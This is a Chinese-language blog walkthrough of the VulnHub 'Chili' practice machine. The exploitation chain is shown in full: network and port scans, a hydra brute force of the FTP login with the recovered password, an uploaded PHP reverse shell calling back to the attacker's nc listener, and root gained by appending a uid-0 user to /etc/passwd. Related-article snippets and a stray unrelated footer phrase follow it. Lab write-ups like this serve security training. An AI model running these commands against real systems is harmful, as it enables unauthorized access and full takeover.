<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    vulnhub之Chili的實踐

    VSole2023-01-03 09:12:49

    今天實踐的是vulnhub的Chili鏡像,

    下載地址,https://download.vulnhub.com/chili/Chili.ova,

    用workstation導入,做地址掃描,sudo netdiscover -r 192.168.58.0/24,

    170就是靶機,

    繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.170,

    有ftp服務,沒掃描到匿名賬戶,上hydra做密碼暴破,用戶名就用chili,

    hydra 192.168.58.170 ftp -l chili -P /usr/share/wordlists/rockyou.txt,

    獲取到用戶名密碼,chili/a1b2c3d4,

    ftp登錄進去,發現可文件上傳的目錄,/var/www/html/.nano,

    直接用kali上自帶的web shell文件,

    cp /usr/share/webshells/php/php-reverse-shell.php shell.php,

    修改好參數,

    $ip = '192.168.58.168'; // CHANGE THIS

    $port = 4444;      // CHANGE THIS

    上傳到ftp服務的/var/www/html/.nano里,

    kali攻擊機上開個反彈shell監聽,nc -lvp 4444,

    瀏覽器訪問http://192.168.58.170/.nano/shell.php,

    反彈shell就過來了,

    改成交互式shell,python3 -c 'import pty; pty.spawn("/bin/bash")',

    發現passwd文件在當前用戶下是可寫的,ls -lna /etc/passwd,

    造一個root權限的用戶進去,

    echo "hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/bash" >> /etc/passwd,

    切到hacker用戶,su hacker,id確認是root,

    本期實踐到此結束,本期實踐到此結束,本期實踐到此結束,本期實踐到此結束,本期實踐到此結束,本期實踐到此結束,本期實踐到此結束,本期實踐到此結束,本期實踐到此結束,本期實踐到此結束。

    shellhacker
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    反彈Shell大全與原理
    2023-04-25 10:15:00
    reverse shell與telnet,ssh等標準shell對應,本質上是網絡概念的客戶端與服務端的角色反轉。對方主機在局域網內,從外網無法直接訪問。對方主機上存在WAF,對主動連接發來的請求數據檢測嚴格,而對向外發出的請求不進行檢測或檢測較少。對方由于防火墻等限制,對方機器只能發送請求,不能接收請求。在滲透測試過程中,得到webshell后一般我們會反彈shell。反彈shell原理A主機開啟9090端口的tcp服務
    安全研究人員指出,網絡攻擊者不僅僅使用了 Sliver 后門,還部署了 BYOVD惡意軟件,意圖破壞安全產品并安裝反向 shell。這一發現證實,威脅攻擊者正在準備采用基于 Go 語言編寫的合法滲透測試工具 Sliver 作為 Cobalt Strike 和 Metasploit 的替代品。
    The Hacker News 網站披露,網絡會議服務 Apache OpenMeetings 存在多個安全漏洞,Sonar 漏洞研究員 Stefan Schiller 表示網絡攻擊者可以利用這些漏洞奪取管理帳戶的控制權,并在易受影響的服務器上執行惡意代碼。
    據The Hacker News 2月2日消息,自 2021 年 9 月以來,全球至少有 1200 臺 Redis 數據庫服務器被一個名為 HeadCrab 的惡意軟件攻擊,并且利用這些受感染的服務器在線掃描更多目標。截至目前,中國、馬來西亞、印度、德國、英國和美國已記錄到大量感染,攻擊者的來歷也尚未明確。為此,專家建議用戶不要將 Redis 服務器直接暴露在互聯網上。
    Ceye DNS:DNS oob平臺 http://ceye.io/. TLS證書信息查詢Censys:https://censys.io. 網絡空間搜索Fofa:https://fofa.info/
    攻擊溯源&溯源反制
    Ceye DNS:DNS oob平臺 http://ceye.io/. TLS證書信息查詢Censys:https://censys.io. 網絡空間搜索Fofa:https://fofa.info/
    據了解,Trigona勒索軟件組織已經發起了多次攻擊事件。該團伙雇傭大量網絡刷手進行虛假交易,并為商家提供銷量和好評,賺取傭金并抽取分成。經過5個多月的縝密偵查,警方徹底查清并打掉該團伙,抓獲涉案嫌疑人23名。目前,案件正在進一步辦理中。近日,其遭受勒索軟件攻擊,旗下AlohaPOS系統平臺發生中斷。勒索團伙BlackCat/ALPHV已經宣布對此負責,并稱已獲取了NCR客戶的憑證。目前,NCR正在調查該事件。
    今天實踐的是vulnhub的sunset/twilight鏡像,下載地址,https://download.
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类